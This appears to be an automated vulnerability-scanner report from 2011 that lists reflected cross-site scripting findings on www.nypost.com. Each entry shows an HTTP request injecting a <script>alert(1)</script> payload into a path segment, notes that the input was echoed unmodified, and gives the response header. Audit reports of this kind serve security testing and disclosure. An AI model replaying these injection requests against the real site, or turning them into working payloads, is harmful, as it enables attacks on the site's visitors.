GET /Resource/SysConfig7b225<script>alert(1)</script>0d0497a7126/WebPortal/nypost/blocks/media_nav/media_nav.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:20 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb4cc<script>alert(1)</script>9c3cd6a2728 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortalbb4cc<script>alert(1)</script>9c3cd6a2728/nypost/blocks/media_nav/media_nav.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:22 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2f65<script>alert(1)</script>8c80e29cec1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostb2f65<script>alert(1)</script>8c80e29cec1/blocks/media_nav/media_nav.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:24 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8563a<script>alert(1)</script>38ee9ec9c37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks8563a<script>alert(1)</script>38ee9ec9c37/media_nav/media_nav.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:26 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 336c6<script>alert(1)</script>3bf9820cf40 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/media_nav336c6<script>alert(1)</script>3bf9820cf40/media_nav.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 9e777<script>alert(1)</script>06ce6d4472 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css9e777<script>alert(1)</script>06ce6d4472 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:32 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa0dc<script>alert(1)</script>33396eab501 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigfa0dc<script>alert(1)</script>33396eab501/WebPortal/nypost/blocks/most_popular/most_popular.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:07 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e40c<script>alert(1)</script>02b54529e86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal9e40c<script>alert(1)</script>02b54529e86/nypost/blocks/most_popular/most_popular.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:09 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc5b5<script>alert(1)</script>038729fe8dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostbc5b5<script>alert(1)</script>038729fe8dc/blocks/most_popular/most_popular.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:11 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 10392<script>alert(1)</script>253c624193c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks10392<script>alert(1)</script>253c624193c/most_popular/most_popular.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9226c<script>alert(1)</script>b8a2d02a74f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/most_popular9226c<script>alert(1)</script>b8a2d02a74f/most_popular.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:16 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 5fa52<script>alert(1)</script>b4b42b0ad96 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css5fa52<script>alert(1)</script>b4b42b0ad96 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:21 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 364a1<script>alert(1)</script>da6f5c3280 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig364a1<script>alert(1)</script>da6f5c3280/WebPortal/nypost/blocks/polls/polls.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:11 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85855<script>alert(1)</script>5fc1451cf0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal85855<script>alert(1)</script>5fc1451cf0d/nypost/blocks/polls/polls.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef1a5<script>alert(1)</script>da66fc38275 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostef1a5<script>alert(1)</script>da66fc38275/blocks/polls/polls.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:16 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 71370<script>alert(1)</script>d2c3ff1ca29 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks71370<script>alert(1)</script>d2c3ff1ca29/polls/polls.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:17 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d74c8<script>alert(1)</script>b4951aa17a9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/pollsd74c8<script>alert(1)</script>b4951aa17a9/polls.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:20 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dd4a6<script>alert(1)</script>ca866cdd848 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.cssdd4a6<script>alert(1)</script>ca866cdd848 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:25 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5272f<script>alert(1)</script>54eedcc8a59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig5272f<script>alert(1)</script>54eedcc8a59/WebPortal/nypost/blocks/popup/popup.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:07 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7972<script>alert(1)</script>91bef6fcb8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortalc7972<script>alert(1)</script>91bef6fcb8b/nypost/blocks/popup/popup.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:08 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 33129<script>alert(1)</script>83e3088b009 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost33129<script>alert(1)</script>83e3088b009/blocks/popup/popup.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7fc95<script>alert(1)</script>95654b959da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks7fc95<script>alert(1)</script>95654b959da/popup/popup.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload aeee3<script>alert(1)</script>6ad20dfcf88 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/popupaeee3<script>alert(1)</script>6ad20dfcf88/popup.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:16 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 2c690<script>alert(1)</script>428078804af was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css2c690<script>alert(1)</script>428078804af HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:19 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3a2ce<script>alert(1)</script>2ed6153ec96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig3a2ce<script>alert(1)</script>2ed6153ec96/WebPortal/nypost/blocks/post_pics/post_pics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a599<script>alert(1)</script>47bd1fdd84d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal1a599<script>alert(1)</script>47bd1fdd84d/nypost/blocks/post_pics/post_pics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d4e27<script>alert(1)</script>057ad3e4165 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostd4e27<script>alert(1)</script>057ad3e4165/blocks/post_pics/post_pics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:19 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9235<script>alert(1)</script>99ea843288a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksd9235<script>alert(1)</script>99ea843288a/post_pics/post_pics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:21 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 93e2e<script>alert(1)</script>5a94076ff26 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/post_pics93e2e<script>alert(1)</script>5a94076ff26/post_pics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:23 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c7ad7<script>alert(1)</script>c89da63014 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.cssc7ad7<script>alert(1)</script>c89da63014 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 722 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
